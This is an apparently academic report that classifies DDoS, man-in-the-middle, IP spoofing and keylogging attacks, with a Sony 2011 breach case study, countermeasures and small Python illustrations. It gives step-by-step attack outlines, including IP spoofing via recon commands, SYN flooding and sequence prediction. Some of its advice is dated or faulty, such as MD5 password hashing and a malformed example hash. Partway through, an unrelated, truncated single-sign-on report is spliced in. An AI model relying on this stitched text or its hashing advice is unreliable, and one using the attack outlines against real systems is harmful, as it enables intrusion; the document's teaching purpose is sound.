We show how the four system attacks can be classified along four different dimensions: CIA Triad classification, scale-of-severity classification, probability-of-occurrence classification and probability-of-detection classification. Three of the four classifications are based on two methodologies: the National Institute of Standards and Technology (NIST) Risk Management Guide and Michael Whitman's risk assessment methodology. The CIA classification is based on the CIA Triad information security model. The probability-of-occurrence and probability-of-detection classifications are based on NIST's risk assessment methodology; their objective is to estimate the probability of such attacks using a qualitative approach. Since it is difficult to quantify how often an attack occurs and how easily it can be detected, the NIST approach provides a basis for deriving the probability from our analysis of the environment of the system attacks. The scale-of-severity classification is based on Michael Whitman's risk assessment methodology, which uses quantitative measures such as weighted scores to evaluate each criterion; the weighted score of each criterion allows us to compute a total weighted score and determine the overall ranking.

3. Types of Attacks

3.1 Distributed Denial of Service

A distributed denial of service (DDoS) attack involves many computers and connections, so that the target server is flooded with requests. DDoS attacks employ standard TCP/IP messages and take advantage of weaknesses in the IP protocol stack to disrupt Internet services. Many DDoS attacks are sourced from bot networks, or botnets. Defenses built on observing large volumes of packets coming from a single source fail, because DDoS traffic comes from all over the network (a short sketch below illustrates this).

Historical perspective. The first DDoS attack occurred in August 1999, when a DDoS tool called Trinoo was deployed on at least 227 systems to flood a single computer at the University of Minnesota, knocking the system out for more than two days. Yahoo! also became a victim of a DDoS attack, becoming inaccessible for three hours and suffering losses of about $500,000. Victims of such attacks either stop functioning completely or become significantly slower. One worrying aspect of DDoS attacks is that the handler gets to choose the location of the agents.

Motivations. DDoS attacks are launched not to steal sensitive information, but to render target systems inaccessible, preventing legitimate users from using a specified network resource. Other incentives include political "hacktivism" or just plain old ego.
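The following minimal sketch shows why single-source defenses fail against a distributed attack, under the simplifying assumption of a fixed per-source request threshold; all values and addresses are illustrative.

```python
from collections import Counter

THRESHOLD = 100  # max requests per source per time window (illustrative)

def blocked_sources(requests):
    """requests: list of source IPs observed in one time window."""
    return {ip for ip, n in Counter(requests).items() if n > THRESHOLD}

# One flooding host is caught immediately:
single = ["10.0.0.1"] * 10_000
print(blocked_sources(single))        # {'10.0.0.1'}

# A botnet of 10,000 hosts sending one request each slips through:
botnet = [f"10.0.{i // 250}.{i % 250}" for i in range(10_000)]
print(blocked_sources(botnet))        # set() - the flood goes undetected
```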
How DDoS is carried out. The attack proceeds in the following steps:

Step 1: An intruder searches the Internet for systems that can be compromised, for example via a stolen account on a system with a large number of users or via inattentive administrators. Many such systems are found on university campuses. (Refer to Appendix B: Distributed Denial of Service, Fig. 2.)

Step 2: The intruder loads the compromised system with hacking tools such as DDoS programs. This compromised system (the DDoS master, or handler) finds other Internet hosts on which it can install its DDoS daemons (agents, or zombies). A daemon is a compromised host that runs a special program. The intruder searches for systems running services with security vulnerabilities by scanning large ranges of IP network address blocks. This is the initial mass-intrusion phase.

Step 3: The exploited systems loaded with the DDoS daemons subsequently carry out the actual attack (refer to Appendix B: Distributed Denial of Service, Fig. 3). The zombie program can be planted on infected hosts via an attachment to spam email. Communication from the zombie to its master can be hidden inside standard protocols such as HTTP, IRC, ICMP or even DNS.

Step 4: The intruder maintains a list of "owned" systems, consisting of the compromised systems running the agents. The actual DDoS attack phase occurs when the intruder runs a program on the master system, instructing the agents to launch the attack on the victim. (Refer to Appendix B: Distributed Denial of Service, Fig. 4.)

3.2 Man-in-the-Middle

A man-in-the-middle (MITM) attack is a type of active attack in which an attacker intrudes into the communication between two victims to intercept the data being transferred and inject false information. Users are usually unaware of whether they are visiting the real website, and it takes a great deal of skill to differentiate an authentic website from a bogus one. The attacker establishes connections with the victims and relays messages between them, leading the victims to believe they are communicating over a private connection when in fact the attacker is controlling and monitoring their traffic with malicious intent.

Historical perspective. One of the earliest known MITM attacks was carried out by the Aspidistra transmitter during World War II. Aspidistra was a British medium-wave radio transmitter used for black propaganda and military deception. It intruded into German radio frequencies by transmitting on them when German transmitters were switched off during air raids, retransmitting the network broadcast as if the station were still on air, so that the signal sounded like it came from official German sources. The Aspidistra transmitter modified news broadcasts by inserting false content and pro-Allied propaganda, causing panic and confusion among listeners.

Motivations. The motivation behind a MITM attack is to gain unauthorized access to accounts and abuse the associated privileges to modify or steal data for financial gain. Attackers may also act to deny authorized users the use of online services and resources.

How MITM is carried out. A common MITM attack is the phishing attack on web-based financial systems.

Phishing attacks on web-based financial systems. Phishing aims to gain control of a customer's information by behaving as a proxy between the customer and the real web-based application.
The affected users are usually customers of e-business services and financial systems, where identity theft is performed on unsuspecting victims. The attacker aims to interpose between a customer and a merchant bank by enticing the customer to enter their credentials on a bogus bank website. The customer enters their credentials and the one-time code from a token (if the website requires two-factor authentication); even when two-factor authentication is in place, it provides no protection against this phishing attack. All of this happens with the customer completely unaware that a MITM attack is in progress. The attacker can then use the credentials on the real banking website to access the customer's bank account and carry out malicious activities such as fraudulent transactions directly with the bank. Future transactions will direct the customer to the malicious proxy server instead of the real bank's server, a result of DNS cache poisoning.

Both HTTP and HTTPS communications are vulnerable to phishing attacks. Attacks on HTTP connections are carried out with the attacker establishing a simultaneous connection between the customer and the real site, proxying all communications between the customer and the bank in real time. In the case of HTTPS connections, the attacker's proxy establishes one SSL connection with the customer and another between itself and the bank's server, allowing the attacker to capture and record all traffic in unencrypted form.

3.3 Spoofing

Spoofing is a situation in which a person or a program impersonates another by falsifying data in order to gain unauthorized access to a system. Spoofing has become increasingly popular across wireless networks, where it is often the starting point of other attacks. Common types of spoofing include email spoofing, ARP spoofing, content spoofing and IP spoofing. The scope of this report focuses on IP spoofing.

IP Spoofing. IP spoofing is a hijacking technique that allows an attacker to gain unauthorized access to computers by sending messages whose source IP address indicates that they come from a trusted host. It can be done simply by replacing the source address of the message with an internal or trusted IP address. IP spoofing can be used to launch various attacks; common ones are blind spoofing, non-blind spoofing and denial of service attacks.

Blind Spoofing. In a blind spoofing attack, the attacker, located outside the network, sends multiple packets to the target computer to obtain and analyze the sequence numbers in use. This allows the attacker to predict the next sequence number and deceive the system by injecting data into the stream of packets without having to authenticate himself.

Denial of Service Attack. IP spoofing is commonly used in DoS attacks to prevent a large-scale attack on a machine or group of machines from being detected. By spoofing the source IP address, the attacker can prolong the DoS attack, since tracing the source of the attack becomes much more difficult.

Historical perspective. The concept of IP spoofing was first discussed in academic circles in the 1980s. S.M. Bellovin of AT&T Bell Labs, author of the April 1989 article "Security Problems in the TCP/IP Protocol Suite", was among the first to identify IP spoofing as a real risk to computer networks.
In the article, Bellovin describes how the creator of the now infamous Internet Worm, Robert Morris, figured out how TCP generated sequence numbers and forged a TCP packet sequence.

Motivations. IP spoofing is employed to commit online criminal activity such as spamming and denial of service (DoS) attacks. These attacks involve large amounts of information transmitted over the network; with a bogus IP address as the source of the messages, the origin of the traffic is hidden and the attacker avoids detection. IP spoofing is also employed to breach network security: with a bogus IP address that mirrors one of the addresses on the network, logging on no longer requires a username and password, so an attacker can bypass the authentication method and illegally access the network.

How IP spoofing is carried out.

Step 1: Detecting a trusted system. The attacker must first identify a system that the target system trusts, where the trust relationship is based on authentication by IP address. This can be done using commands such as rpcinfo -p and showmount -e, through social engineering, or by brute force.

Step 2: Blocking the trusted system. Once the trusted system has been identified, the attacker blocks it by performing a SYN-flooding DoS attack against it, so that the available memory on the trusted system is completely consumed. This prevents the trusted system from responding to any SYN/ACK packet sent by the victim system.

Step 3: Obtaining the last sequence number and predicting the succeeding ones. After the trusted system has been blocked, the attacker must obtain the sequence numbers used by the target system. To do so, the attacker can connect to port 23 or port 25 (TCP ports) just before launching the attack and record the sequence number of the last packet sent by the target system.

Step 4: The actual attack. Once the sequence number has been obtained, the attacker launches the actual attack. The attacker first sends a SYN packet with the spoofed source address to the victim system. This SYN packet is addressed to the rlogin port (513) and requests a trust connection between the victim system and the trusted system. The victim system responds with a SYN/ACK packet addressed to the trusted system, which is discarded because that system is blocked. The attacker then sends an ACK back to the victim system; this ACK is crafted with the spoofed source address so that it appears to originate from the trusted system, and it carries an ACK number equal to the predicted sequence number plus one. If everything succeeds, a trust relationship is established between the victim and the attacker. (Refer to Appendix D: Spoofing, Fig. 6.)

3.4 Keylogger

A keylogging (keystroke logging) attack is a type of malware-based attack in which a malicious party uses a keylogger to record keystrokes on a victim's computer. The keylogger can come in the form of a hardware device or a program that steals sensitive information and tracks user input, including the URLs the user visits. Keylogger attacks are a threat to many organizations and to personal activity, because information can be captured before any encryption is performed (refer to Appendix E: Keylogger, Fig. 7).
The keyboard is still the main method of entering input into a computer, so an attacker can easily obtain valuable information by recording keystrokes. Furthermore, the attacker can infer user behavior from the typing sequence, for example when the user logs in to an email account. The keystrokes are stored in a log file on the compromised machine and sent to the attacker without the user's knowledge. (Refer to Appendix E: Keylogger, Fig. 8.)

Historical perspective. An early keylogger program was written by Perry Kivolowitz while he was still an undergraduate; the source code was posted to Usenet newsgroups on November 17, 1983 [34]. Although attackers use keyloggers to carry out cybercrime, keyloggers can also be used for law enforcement purposes.

Motivations. The purpose is to steal sensitive information such as usernames, passwords, credit card numbers and bank account numbers in order to gain access to an organization's confidential information. Blackmail of the organization often follows once attackers have access to such information.

How keylogging is carried out. Common keyloggers are software keyloggers and hardware keyloggers, and each captures keystrokes in its own way.

Software keylogger. There are three types of software keyloggers: kernel-based, hook-based and user-space. A software keylogger captures data remotely and can affect a large number of machines. When a user opens a file infected with the malware, the program installs itself on the computer without the user noticing, capturing the keystrokes between the keyboard interface and the operating system (OS).

Hardware keylogger. A hardware keylogger uses a connector, such as a PS/2 device (refer to Appendix E: Keylogger, Fig. 9) or a USB keylogger (refer to Appendix E: Keylogger, Fig. 10), placed between the keyboard and the computer to capture keystrokes. Once connected to the machine, it records keystrokes and stores them in the device's own storage. A hardware keylogger requires physical access both to attach the connector to the machine and to retrieve the logged data.

4. System Attack Classifications

4.1 CIA Classification (Information Security Model)

The CIA Triad security model is used to identify which component of the triad is affected by each system attack. Classifying the attacks under the CIA triad gives a better understanding of the security components that are breached. Brief definitions of the CIA components follow.

Confidentiality: sensitive and confidential information is protected from unauthorized access.
Integrity: data is protected from modification and deletion.
Availability: systems, resources and services must be available whenever needed.

Distributed Denial of Service (DDoS): breach of Availability. In our opinion, a DDoS attack breaches the availability of data. Once a DDoS attack is successfully launched, the target server is flooded with requests and becomes inoperable. The service or data becomes unavailable, preventing legitimate users from using a specified network resource such as a website, web service, or computer system.
IP Spoofing: breach of Confidentiality, Integrity and Availability. In our opinion, IP spoofing breaches the confidentiality, integrity and availability of data. Integrity is breached because an IP spoofing-based attack usually requires the attacker to modify the source of a message so that it appears to originate from a trusted source. Confidentiality is breached because once the attacker has successfully launched an IP spoofing-based attack, they can gain unauthorized access to a computer system or network and obtain much confidential information. Availability is breached because IP spoofing can be used to launch denial of service attacks, and the spoofed address makes it harder to trace the source of the attack.

Keylogging: breach of Confidentiality. In our opinion, keylogging breaches the confidentiality of data. Once a keylogging attack is successfully launched, the attacker can log the keystrokes on the victim's computer and thereby gain unauthorized access to confidential information.

Man-in-the-Middle (MITM): breach of Confidentiality, Integrity and Availability. Confidentiality is breached because communication among computers can be eavesdropped on by the attacker, who thereby gains unauthorized access to the data exchanged between systems. Integrity is breached because the attacker can intercept a communication and modify the message before forwarding it to its destination. Availability is breached because the attacker can intercept, destroy or modify messages with the aim of ending the communication between the computers entirely.

4.2 Probability of Occurrence Classification

This classification identifies how likely each system attack is to be carried out. The probability of occurrence is expressed in qualitative terms using three categories: "Frequent", "Occasional" and "Remote", defined as follows.

Frequent: the system attack is likely to occur repeatedly.
Occasional: the system attack is likely to occur once or a few times.
Remote: the system attack is unlikely to occur, but the possibility cannot be ruled out.

Distributed Denial of Service (DDoS): Frequent. In our opinion, DDoS attacks occur quite frequently, as they can be performed easily with minimal resources and expertise. With the growing trend of do-it-yourself attack tools and botnets for hire, even a computer novice can execute a successful DDoS attack. The ease of execution and the amount of damage this attack can cause give attackers a strong incentive to launch it.

IP Spoofing: Remote. In our opinion, IP spoofing-based attacks do not occur frequently, though they do occur from time to time. This is due to the high complexity of the attacks, which usually require substantial resources and technical knowledge from the attackers. Despite this complexity, an attacker who has managed to exploit certain vulnerabilities and is equipped with the necessary resources and expertise can still launch an IP spoofing-based attack.

Keylogging: Frequent. In our opinion, keylogging attacks can take place very frequently.
This is because a keylogging attack can be performed very easily by any staff member with nothing more than a small hardware device. Once this device is plugged into the connector, it starts monitoring the user's keystrokes.

Man-in-the-Middle: Occasional. In our opinion, MITM attacks occur occasionally. They can be relatively easy to perform for an attacker who knows the specific techniques involved. In addition, the large payoff of a MITM attack, such as obtaining and accessing confidential information flowing between computers, means attackers would not want to miss such an opportunity.

4.3 Probability of Detection Classification

This classification identifies the probability of users detecting such attacks on their systems. The probability of detection is described as High, Medium or Low. With the probability of detection, we can also identify the potential to reduce or prevent an attack before it propagates and causes more damage. The reasons below describe what constitutes the rating for each attack.

Distributed Denial of Service (DDoS): Low. The communication between the master and the agents is often so well hidden that it becomes difficult even to locate the master computer. Techniques are frequently employed to deliberately conceal the identity and location of the master within the DDoS network, which makes it much harder to identify, detect or analyze an attack in progress. More often than not, administrators do not even know that their systems have been compromised.

IP Spoofing: Low. The probability of detecting a spoofed IP packet is low because the source address has been modified by the attacker, which makes it difficult for network-monitoring software to trace the source of the attack.

Man-in-the-Middle: Low. Detecting a MITM attack requires technical measures such as cryptographic protocols and verifying whether a certificate authority is trusted. Users who lack this level of technical skill may never notice that their actions are being monitored by an attacker.

Keylogger (hardware): Low. A hardware keylogger is not easily detectable due to its small physical size, and it cannot be detected by any software program; only a physical examination of the keyboard cable will reveal it. If the user never probes the hardware, the keylogger simply continues monitoring the user's keystrokes.

4.4 Severity Classification (Complexity of Attack and Scale of Damage)

This classification determines the severity resulting from the system attacks. The severity ranking is derived from the weighted scores of two criteria, "Scale of Damage" and "Complexity of Attack". We would also like to find out whether attackers require prior knowledge of computer networks or systems to perform such attacks. Scale of damage covers the types of resources affected by an attack and how the attack affects the organization as a whole. Complexity of attack refers to the technical skills, knowledge and expertise required of the attackers to launch the attack.
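As a worked illustration of the weighted-score method, the sketch below recomputes the scores from the weights (60% / 40%) and the per-attack values in the table that follows it.

```python
WEIGHTS = {"damage": 0.6, "complexity": 0.4}
SCORES = {
    "Distributed Denial of Service": {"damage": 1.0, "complexity": 0.5},
    "IP Spoofing":                   {"damage": 0.8, "complexity": 1.0},
    "Man-in-the-Middle":             {"damage": 0.6, "complexity": 0.8},
    "Keylogger (hardware)":          {"damage": 0.4, "complexity": 0.3},
}

def weighted(s):
    # total weighted score = damage * 60% + complexity * 40%
    return s["damage"] * WEIGHTS["damage"] + s["complexity"] * WEIGHTS["complexity"]

for rank, (attack, s) in enumerate(
        sorted(SCORES.items(), key=lambda kv: -weighted(kv[1])), start=1):
    print(f"{rank}. {attack}: {weighted(s):.0%}")
# 1. IP Spoofing: 88%, 2. DDoS: 80%, 3. MITM: 68%, 4. Keylogger: 36%
```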
The total weighted score provides insight into each attack's level of complexity, how readily the attack can be carried out, and how damaging it can be to society or an organization. (Refer to Appendix F for more details on the reasoning.)

Attack                          Scale of Damage (60%)   Complexity of Attack (40%)   Weighted Score               Overall Ranking
Distributed Denial of Service   1.0                     0.5                          1.0*0.6 + 0.5*0.4 = 80%      2
IP Spoofing                     0.8                     1.0                          0.8*0.6 + 1.0*0.4 = 88%      1
Man-in-the-Middle               0.6                     0.8                          0.6*0.6 + 0.8*0.4 = 68%      3
Keylogger (hardware)            0.4                     0.3                          0.4*0.6 + 0.3*0.4 = 36%      4
Total                           2.8                     2.6                          272%

5. Case Study: Sony Corporation

In this section we discuss the various vulnerabilities that were overlooked by Sony Corporation and how those weaknesses paved the way for attacks to be launched against Sony. Some of the attacks have been discussed above. This section also provides our opinions on countermeasures Sony could take to strengthen its security.

5.1 Background of the Sony Attacks

2011 was a bad year for Sony Corporation and its users, as the organization was the victim of a series of security breaches. A group of hackers known as Lulz Security hacked into Sony's systems. Sony was forced to shut down services to contain the crisis, and even had to offer users free credits for online games as compensation. In the following sections we discuss the types of attacks Sony faced, suggested countermeasures, and how the incidents relate to the system attacks discussed in the first part of this paper.

5.2 Sony Case Study Classification

The goal of this classification is to identify the potential vulnerabilities associated with each system attack, the type of attack that stemmed from each vulnerability, and the attack's consequences. In the case of Sony Corporation, research and analysis were carried out to determine the areas of weakness in Sony's system environment that might be exploited. From the list of vulnerabilities identified, we derive the attacks and their associated consequences; the consequences describe the impact on Sony's business and operations if the attacks occur.

Vulnerability: Sony failed to patch its servers regularly.
Attack encountered: Distributed Denial of Service (DDoS).
Consequence: disruption of services and great inconvenience to legitimate users due to the flood of requests arriving at the server.

Vulnerability: Sony did not perform adequate testing on its database.
Attack encountered: SQL injection.
Consequence: data such as users' personal information and Sony's website data were accessed and manipulated, resulting in website defacement.

Vulnerability: Sony allowed the reuse of the same password across different Sony services and other websites.
Attack encountered: brute force attack.
Consequence: attackers could take usernames and passwords obtained from other sources and use them to launch a successful brute force attack.

Vulnerability: Sony did not encrypt the data in its database (e.g. passwords were kept in plaintext) and did not implement a password strength check.
Attack encountered: data theft.
Consequence: because the data were unencrypted, attackers could take advantage of the weakness, steal the data directly, and then log in to Sony users' accounts with the stolen credentials. The database server was also easier to attack, since the passwords chosen by users may be easy to guess.
5.3 Types of Attacks in the Sony Case

5.3.1 Distributed Denial of Service (DDoS)

DDoS attacks targeted several services, including the Sony PlayStation Network, the Qriocity music streaming service, and Sony Online Entertainment. The large volume of traffic sent caused the web servers to become unresponsive. The attack caused disruption, making it difficult for customers to use the services; Sony suffered huge financial losses and its goodwill was adversely affected. Anonymous, the hacktivist group responsible for these attacks, used botnets and a simple DDoS tool called the Low Orbit Ion Cannon (LOIC). From this part of the Sony case, we can see how the DDoS attack discussed in the first section has been put into practice and how it affected a whole organization.

5.3.2 SQL Injection

The hackers used a SQL injection attack to access and expose data held by Sony. SQL injection exploits weaknesses in input validation to run arbitrary commands in the database: the attacker inserts a crafted database query that fools the database server into running malicious code, revealing sensitive information or otherwise compromising the server. In Sony's case, the hackers accessed the passwords, email addresses, home addresses and dates of birth of nearly one million users, and also stole the administrator details of Sony Pictures, compromising the privacy of the site's visitors. Often an attacker can take complete control of the underlying operating system of the SQL server or web application, and ultimately of the web server itself. This attack shows that, beyond the four system attacks covered in the first section, there are many other attacks to which a large corporation may be vulnerable; corporations such as Sony must be constantly prepared for new attacks that can cause great damage and losses.

5.3.3 Brute Force Attack

Sony also encountered brute force attacks, which compromised around 93,000 Sony user accounts and forced Sony to lock those accounts and reset their passwords. According to data released by Lulz Security, about 92% of Sony users reused the same password across multiple Sony websites, and common passwords included "seinfeld", "123456" and "password". As the suggested vulnerabilities indicate, Sony did not incorporate a strong defense mechanism against such attacks; one example is the weak password policy enforced on its users. This made Sony a susceptible, high-value target for hackers conducting brute force attacks against those accounts. Since users often habitually reuse the same password for other accounts, such as email, it becomes much easier for a hacker to combine this with keylogging attacks, all the more so given the low probability of a keylogger being detected by any software program or by the user. By obtaining the database server password, the hacker was able to obtain all the users' emails and passwords.
The attackers could then use the obtained list of credentials to carry out a brute force attack, trying the different possible combinations to gain access to Sony services such as the PlayStation Network and Sony Online Entertainment.

5.3.4 Data Theft

As the classification in Section 5.2 indicates, the unencrypted data in Sony's database meant that attackers who gained access could steal users' personal information and credentials directly and then log in to users' accounts with the stolen information.

5.4 Countermeasures

5.4.1 Distributed Denial of Service

Establish a back-up "mirror" website. In our opinion, Sony should establish a back-up "mirror" website hosted with a different web hosting provider. In the event of a DDoS attack, Sony can switch the affected websites over to the mirror, ensuring that customers can still use its services even while a site is under attack.

5.4.2 SQL Injection

White hat hacker. In our opinion, Sony should hire a white hat hacker, a computer expert specializing in penetration testing, to find and fix the vulnerabilities in its systems. Thorough penetration tests cost far less than the loss of trust, fines, disclosure costs and reputational damage these incidents have caused. Proper testing of the application will prevent such SQL injections.

5.4.3 Brute Force Attack

Incremental delay. Adding a pause after each failed login attempt can help Sony deal with brute force attacks. This method, known as incremental delay, tracks login failures on a per-user-session basis rather than per authentication credential, and adds an additional second to the response time after each failure: one second after the first failed attempt, two seconds after the second, and so on for subsequent attempts. These small delays slow down a brute force attack dramatically, while users who accidentally mistype their password barely notice them. Compared with disabling accounts after multiple failed tries, this method is more practical because users never have to wait out a lockout period before they can reactivate their account.
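Below is a minimal sketch of the incremental-delay idea; all names are illustrative, and a real deployment would track failures server-side per user session.

```python
import time

failures = {}  # user session id -> consecutive failed attempts

def attempt_login(session_id, password, check_credentials):
    delay = failures.get(session_id, 0)
    time.sleep(delay)                   # 0s, 1s, 2s, ... per prior failure
    if check_credentials(password):
        failures.pop(session_id, None)  # reset the counter on success
        return True
    failures[session_id] = delay + 1    # next attempt waits one second more
    return False

# A guessing attack needing n attempts now costs about n*(n-1)/2 seconds,
# while a user who mistypes once waits only a single extra second.
ok = attempt_login("sess-42", "123456", lambda p: p == "correct-password")
print(ok)  # False; the next attempt on this session is delayed by 1 second
```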
5.4.4 Data Theft

Perform hashing of passwords. Since the data theft occurred mainly because the data were unencrypted, Sony should consider hashing its users' passwords with a hashing algorithm such as MD5 before storing them in the database. Hashing turns the user password "my_password" into something like "0x22cd3f2e3f2e56f7ecf5". Since hashing is a one-way function, it is infeasible for an attacker to recover the password from the hash, even after obtaining the password table from the database server. In addition, if Sony is using a Unix system, it should consider incorporating a salt for each user in the database to make storage more secure. A salt is a short string stored in the password file along with the hashed password; with the traditional two-character Unix salt, the same password can be encrypted in 4096 different ways. Without salt, it is easier for an attacker to construct a reverse dictionary that converts hashed passwords back to their original form. With hashing and salt together, users' passwords cannot easily be obtained and revealed in plaintext by an attacker.
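A minimal sketch of salted hashing follows; it assumes nothing about Sony's actual systems, and uses SHA-256 where the text suggests MD5 (MD5 is now considered weak, and modern practice favours deliberately slow schemes such as bcrypt or PBKDF2).

```python
import hashlib
import os

def hash_password(password: str) -> tuple[bytes, str]:
    salt = os.urandom(16)  # a fresh random salt per user
    digest = hashlib.sha256(salt + password.encode()).hexdigest()
    return salt, digest    # both are stored in the database

def verify_password(password: str, salt: bytes, stored: str) -> bool:
    return hashlib.sha256(salt + password.encode()).hexdigest() == stored

salt, digest = hash_password("my_password")
print(digest[:20], "...")                            # looks nothing like the password
print(verify_password("my_password", salt, digest))  # True
print(verify_password("seinfeld", salt, digest))     # False
```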
6. Conclusion

In today's technology-driven marketplace, many businesses rely on the Internet to take advantage of web-based services and stay competitive. However, they cannot rule out the possibility of being targeted, as attackers become smarter and stealthier in their methods. With threats growing more sophisticated and prevalent, it is fundamental for businesses to defend against computer network attacks and protect their network security. The attacks that Sony Corporation faced hold an important lesson for organizations and end users alike: in this advanced technological world, it is very easy to become the victim of a cybercrime. End users should learn to protect themselves by not becoming easy targets for hackers, and organizations should likewise protect their customers' information.

References

1. Kessler, G. C. (2000, November). Distributed denial-of-service. Retrieved from http://www.garykessler.net/library/ddos.html
2. Farrapos, S., Gallon, L., & Owezarski, P. (2005, April). Network security and DoS attacks. Retrieved from http://spiderman2.laas.fr/METROSEC/Security_and_DoS.pdf
3. What is IP spoofing and how does it work? (n.d.). Retrieved from http://www.spamlaws.com/how-IP-spoofing-works.html
4. Velasco, V. (2000, November 21). Introduction to IP spoofing. Retrieved from http://www.sans.org/reading_room/whitepapers/threats/introduction-ip-spoofing_959
5. IP spoofing. (n.d.). Retrieved from http://www.andhrahackers.com/forum/hacking-tut/ip-spoofing/?wap2
6. Hassell, J. (2006, June 8). The top five ways to prevent IP spoofing. Retrieved from http://www.computerworld.com/s/article/9001021/The_top_five_ways_to_prevent_IP_spoofing
7. Wu, T., Chung, J., Yamat, J., & Richman, J. (n.d.). The ethics (or not) of massive government surveillance. Retrieved from http://www-cs-faculty.stanford.edu/~eroberts/cs201/projects/ethics-of-surveillance/tech_keystrokelogging.html
8. Wikipedia. (n.d.). Keystroke logging. Retrieved from http://en.wikipedia.org/wiki/Keystroke_logging
9. Lien, C., & Chen, C. (n.d.). Keylogger defender. Retrieved from http://www.seas.ucla.edu/~chienchi/reports/CS236_keydef_pp1.pdf
10. Sony Corporation. (2011, October 12). Sony Global - announcement regarding unauthorized attempts to verify valid user accounts on PlayStation Network, Sony Entertainment Network and Sony Online Entertainment. Retrieved from http://www.sony.net/SonyInfo/News/Press/201110/11-1012E/index.html
11. Sullivan, B. (n.d.). Preventing a brute force or dictionary attack: How to keep the brutes away from your loot. Retrieved from http://www.infosecwriters.com/text_resources/pdf/Brute_Force_BSullivan.pdf
12. Technical Info. (n.d.). The phishing guide (part 1): understanding and preventing phishing attacks. Retrieved from http://www.technicalinfo.net/papers/Phishing.html

Appendices

Appendix A: System Attack Frequency
Fig. 1. System Attack Frequency [1]

Appendix B: Distributed Denial of Service
Fig. 2. Intruder finding a site to compromise [2]
Fig. 3. Compromised system with DDoS daemon [2]
Fig. 4. Flooded victim's site [2]

Appendix C: Man-in-the-Middle
Fig. 5. Phishing attack [10]

Appendix D: Spoofing
Fig. 6. The actual attack [23]

Appendix E: Keylogger
Fig. 7. How keylogging works [32]
Fig. 8. Sample log file content [33]
Fig. 9. PS/2 keylogger [36]
Fig. 10. USB keylogger [37]

Appendix F: System Attack Classification

Estimated scale of damage (weight 60%):

Distributed Denial of Service: 1.0. The scale of damage done by DDoS can be very large, affecting the availability of many major online sites. For example, the Internet portal Yahoo! became the victim of a DDoS attack, was inaccessible for 3 hours, and suffered a loss of e-commerce and advertising revenue of about $500,000.

IP Spoofing: 0.8. The scale of damage done by IP spoofing-based attacks can be quite large: once such an attack is successfully launched, the attacker can gain unauthorized access to the entire corporate network and steal or compromise the corporation's confidential information.

Man-in-the-Middle: 0.6. The attacker can hijack credentials used in two-factor authentication during online banking. Online banking customers are robbed of their online identities and may incur financial losses if the attacker performs fraudulent transactions directly with the bank using the customers' accounts.

Keylogger (hardware): 0.4. Compared with the other attacks, the scale of damage of a keylogger attack is not as large, because it only logs sensitive information on one particular computer, so not much information may be recorded. Also, different levels of employees have different access rights, so the attacker may not capture the credentials guarding the most confidential information.

Total: 2.8.

Associated complexity of attack (weight 40%):

Distributed Denial of Service: 0.5. A DDoS attack is not very complex; it needs only a vulnerability in a system to exploit, for instance a stolen account the intruder has access to, which the intruder can use to load DDoS programs onto the host.

IP Spoofing: 1.0. IP spoofing is not an attack in itself but a hijacking technique that cyber-criminals use to launch various attacks, and attacks employing it can be very complex. To launch one, the attacker must first have technical knowledge of how the OSI layers, the TCP/IP suite and the IP packet structure work, as well as of the flaws and security problems of the TCP/IP suite. There are also many steps involved: the attacker has to find valid IP and TCP header values in order to forge and inject the right IP packets and gain unauthorized access to the computer, system or network.

Man-in-the-Middle: 0.8. Since MITM attacks include different techniques, their complexity ranges from easy to difficult.
An attacker requires knowledge of the specific technique used to perform a MITM attack (e.g. DNS, ARP, HTTP or SSL). Software such as SSLStrip and Cain & Abel can also be used to carry out MITM attacks. For a simple MITM attack, for example, a small web server (to host a phishing website and capture customers' credentials) would suffice.

Keylogger (hardware): 0.3. Keylogger attacks are not very complex, as a hardware keylogger is the simplest approach to carry out. Attackers only need to know which port to attach the connector to, and the attack does not require many resources: the keylogger can be installed on a machine easily, without much effort, by using the connector.

Total: 2.6.

Severity level ranges (for scale of damage and complexity of attack):
High: 0.8 - 1.0
Medium: 0.5 - 0.7
Low: 0.1 - 0.4

Appendix G: Other References

13. Ponemon Institute. (2011, August). Second annual cost of cyber crime study. Retrieved from http://www.arcsight.com/collateral/whitepapers/2011_Cost_of_Cyber_Crime_Study_August.pdf
14. Hines, E., & Gamble, J. (2002, February 25). Non-blind IP spoofing and session hijacking: A diary from the garden of good and evil. Retrieved from http://flur.net/archive/research/non-blind-hijacking.pdf
15. TCP/IP suite weaknesses. (2006, November 11). Retrieved from http://mudji.net/press/?p=152
16. Bao Ho & Toan Tai Vu (2003). IP spoofing (A study on attacks and countermeasures). Retrieved from http://www.docstoc.com/docs/45752165/IP-spoofing
17. Olzak, T. (2008, April). Keystroke logging (keylogging). Retrieved from http://adventuresinsecurity.com/images/Keystroke_Logging.pdf
18. SpyCop. (n.d.). Hardware keylogger detection. Retrieved from http://spycop.com/keyloggerremoval.htm
19. KeyCarbon. (n.d.). Keystroke recorders for USB keyboards ("KeyCarbon USB"). Retrieved from http://www.keycarbon.com/products/keycarbon_usb/overview/
20. Schneier, B. (2008, November 10). Schneier on Security: Aspidistra. Retrieved from http://www.schneier.com/blog/archives/2008/11/aspidistra.html
21. Wikipedia. (n.d.). Aspidistra (transmitter). Retrieved from http://en.wikipedia.org/wiki/Aspidistra_(transmitter)

Report for the Study of Single-Sign-On (SSO), an introduction and comparison between Kerberos based SSO and OpenID SSO

Xiao Zupao

Abstract. Single-Sign-On is a useful technique that allows users to authenticate their identity to a system only once, after which they are logged in automatically. It saves a great deal of log-in time and also reduces exposure to security problems such as phishing. This report gives a brief introduction to traditional Kerberos-based SSO and to a newer kind of SSO called OpenID, and compares the two techniques in various ways.

Keywords: Single-Sign-On, Kerberos, OpenID.

1 Introduction

Single-sign-on is a technique that links access to multiple independent systems. It allows users to log in only once and then access all the independent systems without logging in manually.

1.1 Benefits

Single-sign-on benefits users in the following ways:

o It reduces the time spent typing in usernames and passwords.
o It reduces password fatigue: with SSO, the user only needs to remember one username and password for all the systems involved.
o It reduces phishing success, since users never need to type in a password themselves when asking for a service.
1.2 Various implementations

There are currently many ways to implement SSO; this part briefly introduces four of them.

Kerberos-based SSO. Kerberos-based SSO maintains a centralized authentication server that stores all users' information. Users first authenticate themselves to this server, which gives back a ticket. The user can then use the ticket to request services from the independent servers associated with the centralized authentication server. The detailed process is described later in this report.

Smart-card-based SSO. Users first insert the smart card and type in a password to authenticate themselves. Later, when they want to access a server, they just insert the card and the authentication is handled by the SSO server. Smart-card-based SSO needs a Kerberos Domain Controller (KDC). As I see it, the process for smart-card-based SSO is the same as for Kerberos-based SSO, except that it needs a card, which makes the initial authentication more secure. But what happens if the user authenticates first and then loses the card?

